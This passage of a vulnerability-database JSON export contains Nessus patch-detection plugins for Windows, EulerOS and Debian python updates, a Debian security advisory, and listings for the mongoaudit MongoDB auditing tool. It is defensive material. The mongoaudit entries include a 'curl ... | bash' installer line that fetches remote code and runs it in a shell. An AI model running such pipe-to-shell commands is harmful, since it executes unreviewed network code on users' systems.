specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. (CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. (CVE-2017-8592)\");\n # https://support.microsoft.com/en-us/help/4025337/windows-7-update-kb4025337\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9d2f3807\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4025337 or Cumulative update KB4025341.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-07';\nkbs = make_list(\"4025341\", \"4025337\");\nvuln = FALSE;\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KB only applies to Window 7 / 2008 R2, SP1\nif (hotfix_check_sp_range(win7:'1') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n# CVE-2017-8563 applies to both OSes and a\n# registry key is required if the target is\n# a domain controller.\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\n# Is target a DC?\nret = get_registry_value(\n handle:hklm,\n item:\"SYSTEM\\CurrentControlSet\\Control\\ProductOptions\\ProductType\"\n);\n\nif (!isnull(ret) && ret == 'LanmanNT')\n{\n # Target is a DC.\n # Does target have required key for CVE-2017-8563 fix?\n ret = get_registry_value(\n handle:hklm,\n item:\"SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters\\LdapEnforceChannelBinding\"\n );\n if (isnull(ret) || (ret != '1' && ret != '2'))\n {\n vuln = TRUE;\n reg_key_note =\n '\\n The registry key \"SYSTEM\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\Parameters\\\\LdapEnforceChannelBinding\"' +\n '\\n is missing or is not equal to \"1\" or \"2\"' +\n '\\n';\n hotfix_add_report(reg_key_note, bulletin:bulletin);\n }\n}\n\nRegCloseKey(handle:hklm);\nclose_registry(close:FALSE);\n\nif (\n # Windows 7 / 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"07_2017\", bulletin:bulletin, rollup_kb_list:[4025341, 4025337])\n)\n vuln = TRUE;\n\nif (vuln)\n{\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:30:31", "bulletinFamily": "scanner", "description": "According to the versions of the python packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - It was discovered that the Python CGIHandler class did not properly protect against the HTTP_PROXY variable name clash in a CGI context. A remote attacker could possibly use this flaw to redirect HTTP requests performed by a Python CGI script to an attacker-controlled proxy via a malicious HTTP request.\n (CVE-2016-1000110)\n\n - It was found that Python's smtplib library did not return an exception when StartTLS failed to be established in the SMTP.starttls() function. A man in the middle attacker could strip out the STARTTLS command without generating an exception on the Python SMTP client application, preventing the establishment of the TLS layer. (CVE-2016-0772)\n\n - It was found that the Python's httplib library (used by urllib, urllib2 and others) did not properly check HTTPConnection.putheader() function arguments. An attacker could use this flaw to inject additional headers in a Python application that allowed user provided header names or values. (CVE-2016-5699)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-14T00:00:00", "id": "EULEROS_SA-2016-1036.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99799", "published": "2017-05-01T00:00:00", "title": "EulerOS 2.0 SP1 : python (EulerOS-SA-2016-1036)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99799);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/11/14 14:36:22\");\n\n script_cve_id(\n \"CVE-2016-0772\",\n \"CVE-2016-1000110\",\n \"CVE-2016-5699\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : python (EulerOS-SA-2016-1036)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the python packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - It was discovered that the Python CGIHandler class did\n not properly protect against the HTTP_PROXY variable\n name clash in a CGI context. A remote attacker could\n possibly use this flaw to redirect HTTP requests\n performed by a Python CGI script to an\n attacker-controlled proxy via a malicious HTTP request.\n (CVE-2016-1000110)\n\n - It was found that Python's smtplib library did not\n return an exception when StartTLS failed to be\n established in the SMTP.starttls() function. A man in\n the middle attacker could strip out the STARTTLS\n command without generating an exception on the Python\n SMTP client application, preventing the establishment\n of the TLS layer. (CVE-2016-0772)\n\n - It was found that the Python's httplib library (used by\n urllib, urllib2 and others) did not properly check\n HTTPConnection.putheader() function arguments. An\n attacker could use this flaw to inject additional\n headers in a Python application that allowed user\n provided header names or values. (CVE-2016-5699)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1036\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0db40b87\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected python packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"python-2.7.5-38\",\n \"python-devel-2.7.5-38\",\n \"python-libs-2.7.5-38\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-02-21T01:29:50", "bulletinFamily": "scanner", "description": "It was discovered that there was a TLS stripping vulnerability in the smptlib library distributed with the CPython interpreter.\n\nThe library did not return an error if StartTLS failed, which might have allowed man-in-the-middle attackers to bypass the TLS protections by leveraging a network position to block the StartTLS command.\n\nFor Debian 7 'Wheezy', this issue has been fixed in python3.2 version 3.2.3-7+deb7u1.\n\nWe recommend that you upgrade your python3.2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-07-09T00:00:00", "id": "DEBIAN_DLA-871.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=97966", "published": "2017-03-27T00:00:00", "title": "Debian DLA-871-1 : python3.2 security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-871-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97966);\n script_version(\"3.2\");\n script_cvs_date(\"Date: 2018/07/09 14:30:26\");\n\n script_cve_id(\"CVE-2016-0772\");\n\n script_name(english:\"Debian DLA-871-1 : python3.2 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that there was a TLS stripping vulnerability in the\nsmptlib library distributed with the CPython interpreter.\n\nThe library did not return an error if StartTLS failed, which might\nhave allowed man-in-the-middle attackers to bypass the TLS protections\nby leveraging a network position to block the StartTLS command.\n\nFor Debian 7 'Wheezy', this issue has been fixed in python3.2 version\n3.2.3-7+deb7u1.\n\nWe recommend that you upgrade your python3.2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/03/msg00029.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/python3.2\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:idle-python3.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libpython3.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:python3.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:python3.2-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:python3.2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:python3.2-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:python3.2-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:python3.2-minimal\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"idle-python3.2\", reference:\"3.2.3-7+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libpython3.2\", reference:\"3.2.3-7+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python3.2\", reference:\"3.2.3-7+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python3.2-dbg\", reference:\"3.2.3-7+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python3.2-dev\", reference:\"3.2.3-7+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python3.2-doc\", reference:\"3.2.3-7+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python3.2-examples\", reference:\"3.2.3-7+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python3.2-minimal\", reference:\"3.2.3-7+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "debian": [{"lastseen": "2018-10-18T13:48:32", "bulletinFamily": "unix", "description": "Package : python3.2\nVersion : 3.2.3-7+deb7u1\nCVE ID : CVE-2016-0772\n\nIt was discovered that there was a TLS stripping vulnerability in the smptlib\nlibrary distributed with the CPython interpreter.\n\nThe library did not return an error if StartTLS failed, which might have\nallowed man-in-the-middle attackers to bypass the TLS protections by leveraging\na network position to block the StartTLS command.\n\nFor Debian 7 &quot;Wheezy&quot;, this issue has been fixed in python3.2 version\n3.2.3-7+deb7u1.\n\nWe recommend that you upgrade your python3.2 packages.\n\n\nRegards,\n\n- -- \n ,&#x27;&#x27;`.\n : :&#x27; : Chris Lamb\n `. `&#x27;` lamby@debian.org / chris-lamb.co.uk\n `-\n\n", "modified": "2017-03-25T08:53:43", "published": "2017-03-25T08:53:43", "id": "DEBIAN:DLA-871-1:C4200", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201703/msg00029.html", "title": "[SECURITY] [DLA 871-1] python3.2 security update", "type": "debian", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "kitploit": [{"lastseen": "2018-10-26T07:34:01", "bulletinFamily": "tools", "description": "[  ](<https://1.bp.blogspot.com/-BAEI4GFqIKM/WKfjgc6Bl2I/AAAAAAAAHTo/mBrqMLZhEq8Tq20yITBuzDYdp_bKqEfLQCLcB/s1600/mongoaudit-header.png>)\n\n \n\n\n** mongoaudit ** is a CLI tool for auditing MongoDB servers, detecting poor security settings and performing automated penetration testing. \n\n\n## Installing with pip \n\nThis is the recommended installation method in case you have ` python ` and ` pip ` . \n\n \n \n pip install mongoaudit\n\n## Alternative installer \n\nUse this if and only if ` python ` and ` pip ` are not available on your platform. \n\n \n \n curl -s https://mongoaud.it/install | bash\n\n_ works on Mac OS X, GNU/Linux and Bash for Windows 10 _ \n_ If you are serious about security you should always use the PIP installer or, better yet, follow best security practices: clone this repository, check the source code and only then run it with ` python mongoaudit ` . _ \n\n\n## Introduction \n\nIt is widely known that there are quite a few holes in MongoDB's default configuration settings. This fact, combined with abundant lazy system administrators and developers, has led to what the press has called the [ _ MongoDB apocalypse _ ](<http://thenextweb.com/insider/2017/01/08/mongodb-ransomware-exists-people-bad-security/>) . \n** mongoaudit ** not only detects misconfigurations, known vulnerabilities and bugs but also gives you advice on how to fix them, recommends best practices and teaches you how to DevOp like a pro! \nThis is how the actual app looks like: \n \n\n\n[  ](<https://1.bp.blogspot.com/-HozOuiEPJP0/WKfjmC_4-5I/AAAAAAAAHTs/9wdfuwReOUkB--UN0hJJf5Iwl9vgp3xygCLcB/s1600/mongoaudit.png>)\n\n \n_ Yep, that's material design on a console line interface. (Powered by [ urwid ](<https://github.com/urwid/urwid>) ) _\n\n## Supported tests \n\n * MongoDB listens on a port different to default one \n * Server only accepts connections from whitelisted hosts / networks \n * MongoDB HTTP status interface is not accessible on port 28017 \n * MongoDB is not exposing its version number \n * MongoDB version is newer than 2.4 \n * TLS/SSL encryption is enabled \n * Authentication is enabled \n * SCRAM-SHA-1 authentication method is enabled \n * Server-side Javascript is forbidden \n * Roles granted to the user only permit CRUD operations * \n * The user has permissions over a single database * \n * Security bug [ CVE-2015-7882 ](<https://jira.mongodb.org/browse/SERVER-20691>)\n * Security bug [ CVE-2015-2705 ](<https://jira.mongodb.org/browse/SERVER-17521>)\n * Security bug [ CVE-2014-8964 ](<https://jira.mongodb.org/browse/SERVER-17252>)\n * Security bug [ CVE-2015-1609 ](<https://jira.mongodb.org/browse/SERVER-17264>)\n * Security bug [ CVE-2014-3971 ](<https://jira.mongodb.org/browse/SERVER-13753>)\n * Security bug [ CVE-2014-2917 ](<https://jira.mongodb.org/browse/SERVER-13644>)\n * Security bug [ CVE-2013-4650 ](<https://jira.mongodb.org/browse/SERVER-9983>)\n * Security bug [ CVE-2013-3969 ](<https://jira.mongodb.org/browse/SERVER-9878>)\n * Security bug [ CVE-2012-6619 ](<https://www.cvedetails.com/cve/CVE-2012-6619/>)\n * Security bug [ CVE-2013-1892 ](<https://www.cvedetails.com/cve/CVE-2013-1892/>)\n * Security bug [ CVE-2013-2132 ](<https://www.cvedetails.com/cve/CVE-2013-2132/>)\n_ Tests marked with an asterisk ( ` * ` ) require valid authentication credentials. _ \n\n\n## How can I best secure my MongoDB? \n\nOnce you run any of the test suites provided by ** mongoaudit ** , it will offer you to receive a fully detailed report via email. This personalized report links to a series of useful guides on how to fix every specific issue and how to harden your MongoDB deployments. \nFor your convenience, we have also published the ** mongoaudit ** guides in our [ Medium publication ](<https://medium.com/mongoaudit>) . \n \n** Disclaimer ** \n\n \n \n \"With great power comes great responsibility\"\n\n * Never use this tool on servers you don't own. Unauthorized access to strangers' computer systems is a crime in many countries. \n * Please use this tool is at your own risk. We will accept no liability for any loss or damage which you may incur no matter how caused. \n * Don't be evil! \n\n \n\n\n** [ Download mongoaudit ](<https://github.com/stampery/mongoaudit>) **\n", "modified": "2017-02-22T14:04:10", "published": "2017-02-22T14:04:10", "id": "KITPLOIT:6230906110179095668", "href": "http://www.kitploit.com/2017/02/mongoaudit-powerful-mongodb-auditing.html", "title": "mongoaudit - A Powerful MongoDB Auditing and Pentesting Tool", "type": "kitploit", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "n0where": [{"lastseen": "2018-10-04T02:31:28", "bulletinFamily": "tools", "description": "## MongoDB Security Audit \n\n* * *\n\nmongoaudit is a CLI tool for auditing MongoDB servers, detecting poor security settings and performing automated penetration testing. It is widely known that there are quite a few holes in MongoDB\u2019s default configuration settings. This fact, combined with abundant lazy system administrators and developers, has led to what the press has called the [ _ MongoDB apocalypse _ ](<http://thenextweb.com/insider/2017/01/08/mongodb-ransomware-exists-people-bad-security/>) . mongoaudit not only detects misconfigurations, known vulnerabilities and bugs but also gives you advice on how to fix them, recommends best practices and teaches you how to DevOp like a pro! \n\nAmong other tests, it checks if: \n\n * MongoDB listens on a port different to default one \n * MongoDB HTTP status interface is disabled \n * TLS/SSL encryption is enabled \n * Authentication is enabled \n * SCRAM-SHA-1 authentication method is enabled \n * Server-side Javascript is forbidden \n * Roles granted to the user only permit CRUD operations \n * The user has permissions over a single database \n * The server is vulnerable to a dozen of different known security bugs \n\n## Installing with pip \n\nThis is the recommended installation method in case you have ` python ` and ` pip ` . \n \n \n pip install mongoaudit\n\n## Alternative installer \n\nUse this if and only if ` python ` and ` pip ` are not available on your platform. \n \n \n curl -s https://mongoaud.it/install | bash\n\n_ works on Mac OS X, GNU/Linux and Bash for Windows 10 _\n\n_ If you are serious about security you should always use the PIP installer or, better yet, follow best security practices: clone this repository, check the source code and only then run it with ` python mongoaudit ` . _\n\n\n\n## Supported tests \n\n * MongoDB listens on a port different to default one \n * Server only accepts connections from whitelisted hosts / networks \n * MongoDB HTTP status interface is not accessible on port 28017 \n * MongoDB is not exposing its version number \n * MongoDB version is newer than 2.4 \n * TLS/SSL encryption is enabled \n * Authentication is enabled \n * SCRAM-SHA-1 authentication method is enabled \n * Server-side Javascript is forbidden \n * Roles granted to the user only permit CRUD operations * \n * The user has permissions over a single database * \n * Security bug [ CVE-2015-7882 ](<https://jira.mongodb.org/browse/SERVER-20691>)\n * Security bug [ CVE-2015-2705 ](<https://jira.mongodb.org/browse/SERVER-17521>)\n * Security bug [ CVE-2014-8964 ](<https://jira.mongodb.org/browse/SERVER-17252>)\n * Security bug [ CVE-2015-1609 ](<https://jira.mongodb.org/browse/SERVER-17264>)\n * Security bug [ CVE-2014-3971 ](<https://jira.mongodb.org/browse/SERVER-13753>)\n * Security bug [ CVE-2014-2917 ](<https://jira.mongodb.org/browse/SERVER-13644>)\n * Security bug [ CVE-2013-4650 ](<https://jira.mongodb.org/browse/SERVER-9983>)\n * Security bug [ CVE-2013-3969 ](<https://jira.mongodb.org/browse/SERVER-9878>)\n * Security bug [ CVE-2012-6619 ](<https://www.cvedetails.com/cve/CVE-2012-6619/>)\n * Security bug [ CVE-2013-1892 ](<https://www.cvedetails.com/cve/CVE-2013-1892/>)\n * Security bug [ CVE-2013-2132 ](<https://www.cvedetails.com/cve/CVE-2013-2132/>)\n\n_ Tests marked with an asterisk ( ` * ` ) require valid authentication credentials. _\n\n[  ](<https://github.com/stampery/mongoaudit>)\n", "modified": "2017-02-16T06:05:56", "published": "2017-02-16T06:05:56", "id": "N0WHERE:159714", "href": "https://n0where.net/mongodb-security-audit-mongoaudit", "title": "MongoDB Security Audit: mongoaudit", "type": "n0where", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}